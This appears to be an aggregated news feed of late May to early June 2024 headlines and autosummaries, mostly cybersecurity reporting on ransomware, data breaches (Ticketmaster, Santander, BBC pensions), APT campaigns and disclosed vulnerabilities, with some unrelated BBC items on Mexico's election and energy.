          Autosummary: The attack chain, per Fortinet FortiGuard Labs, involves a Microsoft Excel file that carries an embedded VBA macro to initiate the infection. "The attacker uses a multi-stage malware strategy to deliver the notorious 'Cobalt Strike' payload and establish communication with a command-and-control (C2) server," security researcher Cara Lin said in a Monday report.


          Experts released PoC exploit code for a critical bug in Progress Telerik Report Servers

          exploits
          2024-06-04 https://securityaffairs.com/164114/hacking/progress-telerik-report-servers-poc.html
          Researchers published a PoC exploit code for an authentication bypass vulnerability on Progress Telerik Report Servers. Researchers published a proof-of-concept (PoC) exploit code for an authentication bypass vulnerability on Progress Telerik Report Servers. Telerik Report Server is an end-to-end report management solution developed by Progress® Telerik. Cybersecurity researcher Sina Kheirkha started his research from an […]

          Autosummary: ⚠️ Here is the Exploit Chain targeting Telerik Report Server CVE-2024-4358/CVE-2024-1800 that allows pre-authenticated Remote Code Execution 🩸 by chaining a deserialization 🪲 and an interesting authentication bypass 🔥🔥🔥 https://t.co/ZkPL8vggcH — SinSinology (@SinSinology), June 3, 2024. An unauthenticated attacker can exploit the flaw to gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.


          New V3B phishing kit targets customers of 54 European banks

          financial
          2024-06-04 https://www.bleepingcomputer.com/news/security/new-v3b-phishing-kit-targets-customers-of-54-european-banks/
          Cybercriminals are promoting a new phishing kit named "V3B" on Telegram, which currently targets customers of 54 major financial institutes in Ireland, the Netherlands, Finland, Austria, Germany, France, Belgium, Greece, Luxembourg, and Italy. [...]



          Major London hospitals disrupted by Synnovis ransomware attack

          exploits ransomware
          2024-06-04 https://www.bleepingcomputer.com/news/security/major-london-hospitals-disrupted-by-synnovis-ransomware-attack/
          A ransomware attack affecting pathology and diagnostic services provider Synnovis has impacted healthcare services at multiple major NHS hospitals in London. [...]

          Autosummary: While Synnovis has yet to issue a public statement regarding the June 3 ransomware attack, memos sent by partner hospitals affected by the attack revealed that this "ongoing critical incident" has had a "major impact" on healthcare services across southeast London.


          Russian Power Companies, IT Firms, and Govt Agencies Hit by Decoy Dog Trojan

          exploits rusia-ucrania
          2024-06-04 https://thehackernews.com/2024/06/russian-power-companies-it-firms-and.html
          Russian organizations are at the receiving end of cyber attacks that have been found to deliver a Windows version of a malware called Decoy Dog. Cybersecurity company Positive Technologies is tracking the activity cluster under the name Operation Lahat, attributing it to an advanced persistent threat (APT) group called HellHounds. "The Hellhounds group compromises organizations they select and

          Autosummary: Details about Decoy Dog, a custom variant of the open-source Pupy RAT, emerged in April 2023, when Infoblox uncovered the malware's use of DNS tunneling for communications with its command-and-control (C2) server to remotely control infected hosts.


          RansomHub gang claims the hack of the telecommunications giant Frontier Communications

          Telcos
          2024-06-04 https://securityaffairs.com/164126/data-breach/ransomhub-gang-hacked-frontier-communications.html
          The RansomHub ransomware group added the American telecommunications company Frontier Communications to the list of victims on its Tor leak site. The RansomHub ransomware group claimed to have stolen the information of over 2 million customers from the American telecommunications company Frontier Communications. The RansomHub group claims to have stolen 5GB of data from the […]

          Autosummary: “Based on our investigation, we have determined that the third party was likely a cybercrime group, which gained access to, among other information, personally identifiable information,” reads the Form 10-Q (quarterly report of financial performance) filed by the company with the SEC in May.


          Cybercriminals attack banking customers in EU with V3B phishing kit – PhotoTAN and SmartID supported.

          financial ciber
          2024-06-04 https://securityaffairs.com/164130/cyber-crime/v3b-phishing-kit.html
          Resecurity uncovered a cybercriminal group that is providing a sophisticated phishing kit, named V3B, to target banking customers in the EU. Resecurity has uncovered a new cybercriminal group providing a Phishing-as-a-Service (PhaaS) platform that is equipping fraudsters with a sophisticated kit (known as “V3B”) to target banking customers in the EU. “Currently, it is estimated that hundreds […]



          TikTok fixes zero-day bug used to hijack high-profile accounts

          exploits
          2024-06-04 https://www.bleepingcomputer.com/news/security/tiktok-fixes-zero-day-bug-used-to-hijack-high-profile-accounts/
          Over the past week, attackers have hijacked high-profile TikTok accounts belonging to multiple companies and celebrities, exploiting a zero-day vulnerability in the social media platform's direct messages feature. [...]

          Autosummary: After being compromised, user accounts belonging to Sony, CNN, and Paris Hilton had to be taken down to prevent abuse.


          Utility scams update

          financial
          2024-06-04 https://www.malwarebytes.com/blog/scams/2024/06/utility-scams-update
          These scammers are persistent and want your billing information to extort money from you.

          Autosummary: Consumer protection: The Federal Trade Commission (FTC) has an article about utility scams; however, the technique mentioned there is about scammers calling victims, rather than the other way around.


          A ransomware attack on Synnovis impacted several London hospitals

          exploits ransomware
          2024-06-04 https://securityaffairs.com/164142/cyber-crime/ransomware-attack-synnovis-london-hospitals.html
          A ransomware attack that hit the provider of pathology and diagnostic services Synnovis severely impacted the operations of several London hospitals. A ransomware attack on pathology and diagnostic services provider Synnovis has severely impacted the operations at several major NHS hospitals in London. The attack forced the impacted hospitals to cancel some healthcare procedures, in […] "

Autosummary: A ransomware attack that hit the provider of pathology and diagnostic services Synnovis severely impacted the operations of several London hospitals (Pierluigi Paganini, June 04, 2024). “Trauma cases at Kings being sent to other sites,” Shaun Lintern (@ShaunLintern) reported on June 4, 2024. Below is the message sent by Professor Ian Abbs, Chief Executive Officer, Guy’s and St Thomas’ NHS Foundation Trust: “Dear Colleague, I am writing to update you about the ongoing critical incident that is currently affecting our pathology services. "


          Australia wants to become a renewable energy superpower. Can it?

          industry
          2024-06-04 https://www.bbc.com/news/articles/cp00vyl6l6mo
          The country has come up with an ambitious plan to become the engine room of the new green economy. "

Autosummary: Alpha HPA already produces a range of ultra-high purity aluminium materials. “This government has continued to approve new gas and coal projects - it’s flown to Japan, India, Korea, and Vietnam to secure long-term markets for gas and coal.” Doing so, the government argues, is a national security priority, as countries examine their trade dependence on Beijing, and look to insulate themselves against supply chain shocks. “It’s a big opportunity for us to be an exporter of climate solutions to the world instead of climate problems,” John Grimes, who heads the Smart Energy Council, says. "


          Smuggled fossils found in Yorkshire return to Brazil

          latam
          2024-06-04 https://www.bbc.com/news/articles/cyxxpz37lryo
          More than 30 fossils are recovered from a Scarborough trader after an international investigation. "

          Autosummary: "


          NethSecurity: Open-source Linux firewall

          Linux
          2024-06-03 https://www.helpnetsecurity.com/2024/06/03/nethsecurity-open-source-linux-firewall/

          NethSecurity is a free, open-source Linux firewall that simplifies network security deployment. It integrates various security features into one platform, including firewalling, intrusion detection and prevention, antivirus, multi-WAN, DNS, and content filtering. NethSecurity has an intuitive interface that delivers real-time insights and control over network security. It is a centralized hub for monitoring and managing firewall activities, presenting essential information such as intrusion attempts, traffic patterns, and system health. Fully featured Linux firewall Some of … More

          The post NethSecurity: Open-source Linux firewall appeared first on Help Net Security.

          "

          Autosummary: Future plans and download Version 8.0 was released recently, but the developers plan to release another major update in the coming months, which is set to include: Firewall Objects Reporting Conntrack UI Admin User Management from the UI NethSecurity is available for free on here. "


          Beware: Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware

          exploits
          2024-06-03 https://thehackernews.com/2024/06/beware-fake-browser-updates-deliver.html
          Fake web browser updates are being used to deliver remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2). "Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity firm eSentire said in a new report. "In April 2024, we observed FakeBat being distributed "

          Autosummary: "Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing "LummaC2" malware," the company said. "


Sheinbaum elected Mexico’s first woman president

          latam
          2024-06-03 https://www.bbc.com/news/articles/cp4475gwny1o
Claudia Sheinbaum is getting more than 56% of Sunday’s vote, convincingly beating her main rival, polls say. "

Autosummary: Ms Sheinbaum, a former energy scientist, has promised continuity, saying that she will continue to build on the "advances" made by Mr López Obrador. "


          Andariel Hackers Target South Korean Institutes with New Dora RAT Malware

          exploits
          2024-06-03 https://thehackernews.com/2024/06/andariel-hackers-target-south-korean.html
          The North Korea-linked threat actor known as Andariel has been observed using a new Golang-based backdoor called Dora RAT in its attacks targeting educational institutes, manufacturing firms, and construction businesses in South Korea. "Keylogger, Infostealer, and proxy tools on top of the backdoor were utilized for the attacks," the AhnLab Security Intelligence Center (ASEC) said in a report "

          Autosummary: "


          APT28 targets key networks in Europe with HeadLace malware

          exploits
          2024-06-03 https://securityaffairs.com/164061/apt/apt28-headlace-malware-europe.html
          Russia-linked APT28 used the HeadLace malware and credential-harvesting web pages in attacks against networks across Europe. Researchers at Insikt Group observed Russian GRU’s unit APT28 targeting networks across Europe with information-stealer Headlace and credential-harvesting web pages. The experts observed the APT deploying Headlace in three distinct phases from April to December 2023, respectively, using phishing, compromised internet […] "

          Autosummary: The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "


          Q1 2024 – a brief overview of the main incidents in industrial cybersecurity

          industry ciber
          2024-06-03 https://ics-cert.kaspersky.com/publications/q1-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
          A total of 30 incidents were confirmed by victims. 37% of victims reported denial of operations or product shipment caused by the incident. Almost half of all incidents resulted in disruption of the victims’ public digital services. "

Autosummary: The victims belong to the following industries/sectors: manufacturing (including automotive, aerospace, pharmaceutical, food and beverages, clothing, cosmetics and many other sub-sectors), utility, energy, transportation and logistics, engineering, and mining.
Electronics. Foxsemicon hit by ransomware (Manufacturing, electronics | Denial of IT services, data leakage, personal data leakage | Ransomware). On January 15, semiconductor equipment manufacturer Foxsemicon Integrated Technology, a subsidiary of Taiwanese electronics giant Foxconn, was the victim of a cyberattack.
Pharmaceutical. HAL Allergy hit by ransomware (Manufacturing, pharmaceutical | Data leakage, denial of services, product delivery delay | Ransomware). On February 19, Dutch pharmaceutical company HAL Allergy Group was hit by a ransomware attack, according to a statement on its website.
Veolia hit by ransomware (Water supply, utility | Denial of IT systems, denial of services, personal data leakage | Ransomware). The North American municipal water division of Veolia, a French transnational utility company, experienced a ransomware incident that impacted certain software applications and systems.
Varta hit by cyberattack (Manufacturing, automotive | Denial of IT systems, denial of operations). Varta, a German manufacturer of batteries for the automotive, industrial and consumer sectors, disclosed that its systems were affected by a cyberattack on February 12.
Hewlett Packard hit by cyberattack (Manufacturing, electronics | Data leakage | APT). On January 19, Hewlett Packard Enterprise filed a Form 8-K with the US Securities and Exchange Commission (SEC), reporting unauthorized access to the company’s cloud-based email environment by a threat actor believed to be Midnight Blizzard (aka Dukes, CozyBear and NOBELIUM/APT29/BlueBravo). The group said it had stolen 110GB of data from Lush, allegedly including many personal documents such as passport scans, and company documents related to accounting, finance, tax, projects, and customers.
EAS hit by ransomware (Manufacturing, engineering | Data leakage, denial of operations | Ransomware). Dutch mechanical engineering and manufacturing company EAS Europe was the victim of a ransomware attack on February 26, according to a notice on its website.
Logistics and transportation. GCA hit by cyberattack (Transportation, logistics | Denial of IT services). French transport and logistics company GCA (Groupe Charles André) suffered a cyberattack during the night of February 17-18, resulting in an interruption of its internet access and the disruption of its usual communications, according to a message sent to its customers.
Muscatine Power and Water hit by ransomware (Water supply, energy, utility | Denial of IT services, personal data leakage | Ransomware). US utility company Muscatine Power and Water (MPW) discovered a cybersecurity incident impacting its corporate network environment.
Automotive. ThyssenKrupp hit by cyberattack (Manufacturing, automotive | Denial of IT systems, denial of operations). German steelmaker and automotive supplier ThyssenKrupp said in a statement that it suffered a cyberattack that affected its auto body manufacturing division, ThyssenKrupp Automotive Body Solutions. The forensic investigation revealed that some current and former customer data, such as address, social security number, driver’s license, etc., may have been compromised in the incident.
Etesia hit by cyberattack (Manufacturing | Denial of IT systems, services and operations). French mower manufacturer Etesia was the victim of a cyberattack on February 2, according to local press reports, forcing 160 employees to work part-time.
Radiant Logistics hit by cyberattack (Transportation, logistics | Denial of services). Radiant Logistics, an international freight company, isolated its Canadian operations following a cybersecurity incident. "


          Mexico"s first female president breaks political glass ceiling

          latam
          2024-06-03 https://www.bbc.com/news/articles/cq552vz5y5zo
Given Mexico’s deeply ingrained patriarchy and entrenched machismo, Claudia Sheinbaum’s victory is no small feat. "

          Autosummary: "It means more rights, a welfare state, education, health, access to housing, and that a living wage is a right, not a privilege," she added.Now, in a few months, she will occupy the National Palace, succeeding her mentor, outgoing President Andrés Manuel López Obrador, known by his initials, Amlo. "


          WhatsApp cryptocurrency scam goes for the cash prize

          financial
          2024-06-03 https://www.malwarebytes.com/blog/news/2024/06/whatsapp-cryptocurrency-scam-goes-for-the-cash-prize
          A scammer tried to seduce us by offering the credentials to an account that held roughly half a million dollars. "

Autosummary: Any unsuspecting victim that has come this far and is willing to steal from the treasure dropped in their lap now realizes that before they can enjoy all that money, they first need to open a new account. Malwarebytes blocked the domain for fraud. To fully understand the message, it’s good to know that USTD stands for Tether, a cryptocurrency referred to as a stablecoin because its value is pegged to a fiat currency. A TRC20 wallet app is an application, accessible on mobile/web or desktop devices, designed specifically for storing, managing, and engaging with TRC20 tokens. Sadly, there were obstacles: transfers can only be done to other accounts on the platform and the recipient needs to be at least a VIP1 level. "


          Exploit for critical Progress Telerik auth bypass released, patch now

          exploits
          2024-06-03 https://www.bleepingcomputer.com/news/security/exploit-for-critical-progress-telerik-auth-bypass-released-patch-now/
          Researchers have published a proof-of-concept (PoC) exploit script demonstrating a chained remote code execution (RCE) vulnerability on Progress Telerik Report Servers. [...] "

          Autosummary: The Telerik Report Server is an API-powered end-to-end encrypted report management solution organizations use to streamline the creation, sharing, storage, distribution, and scheduling of reports. "


          Microsoft India’s X account hijacked in Roaring Kitty crypto scam

          financial
          2024-06-03 https://www.bleepingcomputer.com/news/security/microsoft-indias-x-account-hijacked-in-roaring-kitty-crypto-scam-to-push-wallet-drainers/
          The official Microsoft India account on Twitter, with over 211,000 followers, was hijacked by cryptocurrency scammers to impersonate Roaring Kitty, the handle used by notorious meme stock trader Keith Gill. [...] "

          Autosummary: "


          CISA adds Oracle WebLogic Server flaw to its Known Exploited Vulnerabilities catalog

          exploits
          2024-06-03 https://securityaffairs.com/164094/hacking/cisa-adds-oracle-weblogic-server-flaw-to-its-known-exploited-vulnerabilities-catalog.html
          CISA adds Oracle WebLogic Server OS command injection vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Oracle WebLogic Server vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The issue, tracked as CVE-2017-3506 (CVSS score 7.4), is an OS command injection. The vulnerability resides in the Oracle WebLogic […] "

          Autosummary: "


          Can "energy hog" hot tubs be greener?

          industry
          2024-06-03 https://www.bbc.com/news/articles/cqllvze3204o
          Hot tubs are becoming a standard feature at holiday parks, but can they be made more energy efficient? "

Autosummary: This led the company to institute a new hot tub policy, where guests have to pay more to use a hot tub in the summer, or if their hot tub requires a mid-week water change. “In the winter, most guests still want to opt in to the hot tub but increasingly in the summer, more and more guests are opting out,” says Al Judge, the cofounder of AliKats. "


          Collection agency FBCS ups data breach tally to 3.2 million people

          financial
          2024-06-03 https://www.bleepingcomputer.com/news/security/collection-agency-fbcs-ups-data-breach-tally-to-32-million-people/
          Debt collection agency Financial Business and Consumer Solutions (FBCS) now says over 3.2 million people have been impacted by a data breach that occurred in February. [...] "

          Autosummary: "


          Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution

          industry
          2024-06-02 https://www.helpnetsecurity.com/2024/06/02/week-in-review-attackers-trying-to-access-check-point-vpns-nist-csf-2-0-security-metrics-evolution/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RansomLord: Open-source anti-ransomware exploit tool RansomLord is an open-source tool that automates the creation of PE files, which are used to exploit ransomware pre-encryption. Attackers are probing Check Point Remote Access VPN devices Attackers are trying to gain access to Check Point VPN devices via local accounts protected only by passwords, the company has warned on Monday. How to combat … More

          The post Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution appeared first on Help Net Security.

          "

          Autosummary: Chronon: Open-source data platform for AI/ML applications Chronon is an open-source, end-to-end feature platform designed for machine learning (ML) teams to build, deploy, manage, and monitor data pipelines for machine learning. "


          FlyingYeti targets Ukraine using WinRAR exploit to deliver COOKBOX Malware

          exploits
          2024-06-02 https://securityaffairs.com/164017/hacking/flyingyeti-targets-ukraine.html
Russia-linked threat actor FlyingYeti is targeting Ukraine with a phishing campaign to deliver the PowerShell malware COOKBOX. Cloudflare researchers discovered a phishing campaign conducted by the Russia-linked threat actor FlyingYeti (aka UAC-0149) targeting Ukraine. The experts published a report describing a real-time effort to disrupt and delay this threat activity. At the beginning of Russia’s invasion of Ukraine […] "

Autosummary: On the spoofed site, a large green button prompted users to download a document named “Рахунок.docx” (“Invoice.docx”), which instead downloaded a malicious archive titled “Заборгованість по ЖКП.rar” (“Debt for housing and utility services.rar”). Russia-linked threat actor FlyingYeti is targeting Ukraine with a phishing campaign to deliver the PowerShell malware COOKBOX (Pierluigi Paganini, June 02, 2024). "


UK ambassador in Mexico left post after ‘pointing gun at staff’

          latam
          2024-06-01 https://www.bbc.com/news/articles/crggz77zp7zo
A video posted on social media claims to show Jon Benjamin aiming a weapon at another man, while looking down the rifle’s sight. "

Autosummary: In the video, a man resembling Jon Benjamin can be seen aiming a gun at people in a car. Mr Benjamin hasn’t commented so far on what appears to have been a badly misplaced joke. "


          Critical Apache Log4j2 flaw still threatens global finance

          financial
          2024-06-01 https://securityaffairs.com/163984/hacking/critical-apache-log4j2-flaw-still-threatens-global-finance.html
The vulnerability CVE-2021-44832 in the Apache Log4j2 library is still a serious problem for multiple industries; an expert warns it threatens global finance. The independent cyber threat intelligence analyst Anis Haboubi warns of a severe logging configuration flaw that could dramatically impact the financial industry. The vulnerability is CVE-2021-44832 and impacts Apache Log4j2; a remote attacker can […] "

Autosummary: The vulnerability CVE-2021-44832 in the Apache Log4j2 library is still a serious problem for multiple industries; an expert warns it threatens global finance (Pierluigi Paganini, June 01, 2024). “The breaches have resulted in the exfiltration of several terabytes of customer data, including access tokens, email account passwords, and SSL certificates. "


          Kaspersky releases free tool that scans Linux for known threats

          Linux
          2024-06-01 https://www.bleepingcomputer.com/news/software/kaspersky-releases-free-tool-that-scans-linux-for-known-threats/
          Kaspersky has released a new virus removal tool named KVRT for the Linux platform, allowing users to scan their systems and remove malware and other known threats for free. [...] "

          Autosummary: Kaspersky has tested the tool on popular Linux distributions and confirmed it works on Red Hat Enterprise Linux, CentOS, Linux Mint, Ubuntu, SUSE, openSUSE, and Debian, among others. "


          Ticketmaster confirms customer data breach

          financial
          2024-06-01 https://www.malwarebytes.com/blog/personal/2024/06/ticketmaster-confirms-customer-data-breach
          Live Nation has confirmed what everyone has been speculating on for the last week: Ticketmaster has suffered a data breach. "

Autosummary: The data was advertised for $500,000 and says it includes customer names, addresses, emails, credit card details, order information, and more. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          Ticketmaster confirms data breach impacting 560 million customers

          financial
          2024-06-01 https://securityaffairs.com/163999/data-breach/ticketmaster-confirms-data-breach.html
          Ticketmaster owner Live Nation confirmed the Ticketmaster data breach that compromised the data of 560 million customers. ShinyHunters, the current administrator of BreachForums, recently claimed the hack of Ticketmaster and offered for sale 1.3 TB of data, including full details of 560 million customers, for $500,000. Stolen data includes names, emails, addresses, phone numbers, ticket sales, […] "

          Autosummary: “On May 20, 2024, Live Nation Entertainment, Inc. (the “Company” or “we”) identified unauthorized activity within a third-party cloud database environment containing Company data (primarily from its Ticketmaster L.L.C. subsidiary) and launched an investigation with industry-leading forensic investigators to understand what happened.” "


Meet the women campaigning to become Mexico’s first female president

          latam
          2024-05-31 https://www.bbc.com/news/articles/cxrr597e907o
          Claudia Sheinbaum and Xóchitl Gálvez are election front-runners in a deeply patriarchal society. "

Autosummary: Will Grant, Mexico and Central America correspondent. Opinion polls have given Xóchitl Gálvez and Claudia Sheinbaum a wide lead over their rivals. As Claudia Sheinbaum, the front-runner in Mexico’s presidential election, arrives for a rally in a packed park in the colonial city of Orizaba, the crowd starts to chant "Presidenta!" With her closest rival, Xóchitl Gálvez, also a woman, and the only man in the presidential race a distant third, Mexico is almost certain to break centuries of male domination of the country’s highest office. "


          apexanalytix Cyber Risk provides instant alerts for supplier data breaches

          financial
          2024-05-31 https://www.helpnetsecurity.com/2024/05/31/apexanalytix-cyber-risk/

          apexanalytix launched Cyber Risk, a solution that automatically assesses the cybersecurity posture of every supplier, continuously monitors the dark web to uncover risk exposure and responds to threats impacting suppliers in real-time. Business partner data breaches account for 15% of all cyberattacks, costing organizations an average of $4.76 million each year. With cyberattacks poised to be the top threat to supply chains over the next five years, businesses must have full visibility into their suppliers … More

          The post apexanalytix Cyber Risk provides instant alerts for supplier data breaches appeared first on Help Net Security.

          "

          Autosummary: By offloading the significant burden of cyber risk management, companies can worry less about the administrative tasks and focus more on executing the risk-aware strategies that enhance operational resilience,” said Charlie Clark, GM & EVP, apexanalytix Cyber Risk division. "


          BBC disclosed a data breach impacting its Pension Scheme members

          financial
          2024-05-31 https://securityaffairs.com/163908/data-breach/bbc-disclosed-data-breach.html
          The BBC disclosed a data breach that exposed the personal information of BBC Pension Scheme members. The BBC disclosed a data breach that occurred on May 21. Threat actors gained access to files on a cloud-based service belonging to the British public service broadcaster. “The BBC’s information security team has alerted us to a data […] "

          Autosummary: Members are advised to be cautious of any unsolicited communications requesting personal information or unexpected actions, including letters, calls, texts, emails, and web page referrals. "


          25,000 individuals affected in BBC Pension Scheme data breach

          financial
          2024-05-31 https://www.helpnetsecurity.com/2024/05/31/bbc-pension-scheme-data-breach/

          Personal information of current and former BBC employees has been exposed in a data breach that affected the broadcaster’s in-house pension scheme. More than 25,000 individuals have been affected, according to The Guardian. What data was exposed? “On the 21 May, the BBC’s information security team alerted us to a data security incident, in which some files containing personal information of BBC Pension Scheme members records were copied from a cloud-based data storage service used … More

          The post 25,000 individuals affected in BBC Pension Scheme data breach appeared first on Help Net Security.

          "

          Autosummary: “On the 21 May, the BBC’s information security team alerted us to a data security incident, in which some files containing personal information of BBC Pension Scheme members records were copied from a cloud-based data storage service used by our administration team,” the BBC Pension and Benefits Centre said. "


          Check Point VPN zero-day exploited since beginning of April (CVE-2024-24919)

          exploits
          2024-05-31 https://www.helpnetsecurity.com/2024/05/31/cve-2024-24919/

          Attackers have been exploiting CVE-2024-24919, a zero-day vulnerability in Check Point Security Gateways, to pinpoint and extract password hashes for local accounts, which they then used to move laterally in the target organizations’ network. “The vulnerability is particularly critical because it does not require any user interaction or privileges, making it easy to exploit remotely,” IT security service provider Mnemonic noted, and shared that they have observed several attacks that included CVE-2024-24919 exploitation. About CVE-2024-24919 … More

          The post Check Point VPN zero-day exploited since beginning of April (CVE-2024-24919) appeared first on Help Net Security.

          "

Autosummary: About CVE-2024-24919: the existence and in-the-wild exploitation of the flaw was revealed by Check Point on Tuesday, a day after the company warned about discovered instances of attackers making login attempts “using old VPN local-accounts relying on unrecommended password-only authentication method.” "


          Russian Hackers Target Europe with HeadLace Malware and Credential Harvesting

          exploits rusia-ucrania
          2024-05-31 https://thehackernews.com/2024/05/russian-hackers-target-europe-with.html
          The Russian GRU-backed threat actor APT28 has been attributed as behind a series of campaigns targeting networks across Europe with the HeadLace malware and credential-harvesting web pages. APT28, also known by the names BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is an advanced persistent threat (APT) group affiliated with "

Autosummary: APT28, also known by the names BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is an advanced persistent threat (APT) group affiliated with Russia’s strategic military intelligence unit, the GRU. "


          Over 600,000 SOHO routers were destroyed by Chalubo malware in 72 hours

          exploits
          2024-05-31 https://securityaffairs.com/163939/malware/chalubo-destroyed-600000-soho-routers.html
          The Chalubo trojan destroyed over 600,000 SOHO routers from a single ISP, researchers from Lumen Technologies reported. Between October 25 and October 27, 2023, the Chalubo malware destroyed more than 600,000 small office/home office (SOHO) routers belonging to the same ISP. Black Lotus did not name the impacted ISP, however, Bleeping Computer speculates the attack […] "

Autosummary: The Chalubo trojan destroyed over 600,000 SOHO routers from a single ISP, researchers from Lumen Technologies reported (Pierluigi Paganini, May 31, 2024). Between October 25 and October 27, 2023, the Chalubo malware destroyed more than 600,000 small office/home office (SOHO) routers belonging to the same ISP. "


All Santander staff and ‘30 million’ customers hacked

          bancosmx latam
          2024-05-31 https://www.bbc.com/news/articles/c6ppv06e3n8o
          Their data is being sold online by the same gang who this week claimed to have hacked Ticketmaster. "

          Autosummary: "


          Snowflake account hacks linked to Santander, Ticketmaster breaches

          bancosmx
          2024-05-31 https://www.bleepingcomputer.com/news/security/snowflake-account-hacks-linked-to-santander-ticketmaster-breaches/
A threat actor claiming recent Santander and Ticketmaster breaches says they stole data after hacking into an employee’s account at cloud storage company Snowflake. However, Snowflake disputes these claims, saying recent breaches were caused by poorly secured customer accounts. [...] "

          Autosummary: Snowflake"s cloud data platform is used by 9,437 customers, including some of the largest companies worldwide, like Adobe, AT&T, Capital One, Doordash, HP, Instacart, JetBlue, Kraft Heinz, Mastercard, Micron, NBC Universal, Nielsen, Novartis, Okta, PepsiCo, Siemens, US Foods, Western Union, Yamaha, and many others. "


          Europol identifies 8 cybercriminals tied to malware loader botnets

          exploits ciber
          2024-05-31 https://www.bleepingcomputer.com/news/legal/europol-identifies-8-cybercriminals-tied-to-malware-loader-botnets/
          Europol and German law enforcement have revealed the identities of eight cybercriminals linked to the various malware droppers and loaders disrupted as part of the Operation Endgame law enforcement operation. [...] "

          Autosummary: Oleg Vyacheslavovich Kucherov: Also known as "gabr," the 51-year-old Russian is implicated as a key member of the "Trickbot" group also known as "Wizard Spider," engaging in infecting computer systems, stealing data, and using ransomware to extort victims. "


          ShinyHunters claims Santander breach, selling data for 30M customers

          bancosmx
          2024-05-31 https://www.bleepingcomputer.com/news/security/shinyhunters-claims-santander-breach-selling-data-for-30m-customers/
          A threat actor known as ShinyHunters is claiming to be selling a massive trove of Santander Bank data, including information for 30 million customers, employees, and bank account data, two weeks after the bank reported a data breach. [...] "

Autosummary: In the past, ShinyHunters has breached or leaked the data for numerous companies, including Wattpad, Tokopedia, Microsoft’s GitHub account, BigBasket, Nitro PDF, Pixlr, TeeSpring, Promo.com, Mathway, and many more. "


          Live Nation finally confirms massive Ticketmaster data breach

          financial
          2024-05-31 https://www.bleepingcomputer.com/news/security/live-nation-finally-confirms-massive-ticketmaster-data-breach/
          Live Nation has confirmed that Ticketmaster suffered a data breach after its data was stolen from a third-party cloud database provider, which is believed to be Snowflake. [...] "

          Autosummary: The allegedly stolen databases supposedly contain 1.3TB of data, including customers' full details (i.e., names, home and email addresses, and phone numbers), as well as ticket sales, order, and event information for 560 million customers. "


          CISA warns of actively exploited Linux privilege elevation flaw

          exploits Linux
          2024-05-31 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-linux-privilege-elevation-flaw/
          The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including a Linux kernel privilege elevation flaw. [...] "

          Autosummary: The fix has been backported to multiple stable kernel versions: v5.4.269, v5.10.210, v6.6.15, v4.19.307, v6.1.76, v5.15.149 and v6.7.3 (and later releases in each series). In late March 2024, a security researcher using the alias "Notselwyn" published a detailed write-up and proof-of-concept (PoC) exploit on GitHub, showcasing how to achieve local privilege escalation by exploiting the flaw on Linux kernel versions between 5.14 and 6.6. "


          Stalkerware app pcTattletale announces it is ‘out of business’ after suffering data breach and website defacement

          financial
          2024-05-31 https://www.bitdefender.com/blog/hotforsecurity/stalkerware-app-pctattletale-announces-it-is-out-of-business-after-suffering-data-breach-and-website-defacement/
          US spyware vendor pcTattletale has shut down its operations following a serious data breach that exposed sensitive information about its customers, as well as data stolen from some of their victims. pcTattletale was promoted as "employee and child monitoring software" designed to "protect your business and family." Of course, what it actually was, was a way to surreptitiously spy upon other people's phones and computers - secretly viewing everything they did. Read more in my article on the Hot for Security blog. "

          Autosummary: The leaked data included details of 138,751 customer accounts, including device information, email addresses, IP addresses, names, passwords, phone numbers, physical addresses, SMS messages, and usernames. "


          Snowflake compromised? Attackers exploit stolen credentials

          exploits
          2024-05-31 https://www.helpnetsecurity.com/2024/05/31/snowflake-compromised-data-theft/

          Have attackers compromised Snowflake or just their customers’ accounts and databases? Conflicting claims muddy the situation. What is Snowflake? Snowflake is a cloud-based data storage and analytics company based in the US, and claims nearly 9,500 organizations around the world as customers. “From an enterprise perspective, Snowflake is typically set up as a cloud-based data warehousing solution. Enterprises choose a cloud provider (AWS, Azure, or Google Cloud), and set up their Snowflake account within the chosen … More

          The post Snowflake compromised? Attackers exploit stolen credentials appeared first on Help Net Security.

          "

          Autosummary: Snowflake has compiled a document outlining known indicators of compromise, investigative queries Snowflake admins can use to detect access from suspected IP addresses and clients, remediation measures (disabling suspected users, resetting credentials) they should take if they find their databases have been accessed by the attackers, and attack prevention advice. "Data is ingested from various sources, transformed, and analyzed using SQL,” Doron Karmi, Senior Cloud Security Researcher at Mitiga, told Help Net Security. "


          ShinyHunters is selling data of 30 million Santander customers

          bancosmx
          2024-05-31 https://securityaffairs.com/163956/data-breach/shinyhunters-claims-santander-breach.html
          The threat actor ShinyHunters claims a breach of Santander and is offering bank data for sale, including information for 30 million customers. The notorious threat actor ShinyHunters is offering a huge trove of data allegedly stolen from Santander Bank for sale. ShinyHunters claims to have stolen information for 30 million customers, employees, and bank account […] "

          Autosummary: On May 30, 2024, ShinyHunters published an announcement titled “Santander Bank Data – Spain, Chile, Uruguay – Customers, CC, Bank, more” that claims the countries affected are Spain, Chile, and Uruguay. "


          Migrants and drugs - why Mexico's election matters to the US

          latam
          2024-05-31 https://www.bbc.com/news/articles/cv22e75g4n4o
